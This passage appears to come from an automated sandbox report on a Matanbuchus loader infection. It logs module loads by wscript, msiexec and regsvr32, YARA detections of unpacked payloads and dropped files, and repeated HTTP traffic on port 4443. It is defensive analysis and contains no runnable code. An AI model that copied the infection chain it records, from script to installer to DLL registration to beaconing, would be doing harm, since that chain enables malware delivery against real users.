                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srpapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: tsappcmp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior

                  Data Obfuscation

                  barindex
                  Yara detected Matanbuchus
                  Source: Yara matchFile source: 14.2.regsvr32.exe.6b610000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.regsvr32.exe.6b610000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.regsvr32.exe.6b610000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.rundll32.exe.4f80000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.rundll32.exe.6c330000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.rundll32.exe.4f80000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.regsvr32.exe.7f6d0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.rundll32.exe.7f290000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.rundll32.exe.7f290000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.regsvr32.exe.7ebe0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.regsvr32.exe.7ebe0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.regsvr32.exe.7f6d0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2943950120.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\silver\libcurl.dll, type: DROPPED
                  Source: Yara matchFile source: C:\Users\user\8f08\813848\813848.winmd, type: DROPPED
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2F1116 push ecx; ret 4_2_7F2F1129
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F6FB37E push cs; retf 0002h6_2_7F6FB37F
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F731116 push ecx; ret 6_2_7F731129
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC0B37E push cs; retf 0002h11_2_7EC0B37F
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC41116 push ecx; ret 11_2_7EC41129
                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\8f08\813848\813848.winmdJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6890.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\silver\libcurl.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI67E2.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6850.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI68B0.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6890.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI67E2.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6850.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI68B0.tmpJump to dropped file
                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\8f08\813848\813848.winmdJump to dropped file

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Uses known network protocols on non-standard ports
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49745
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49746
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49747
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49748
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49749
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49752
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49754
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49755
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49756
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49757
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49760
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49761
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49767
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49773
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49779
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49782
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49787
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49793
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49798
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49804
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49806
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49811
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49817
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49823
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49829
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49831
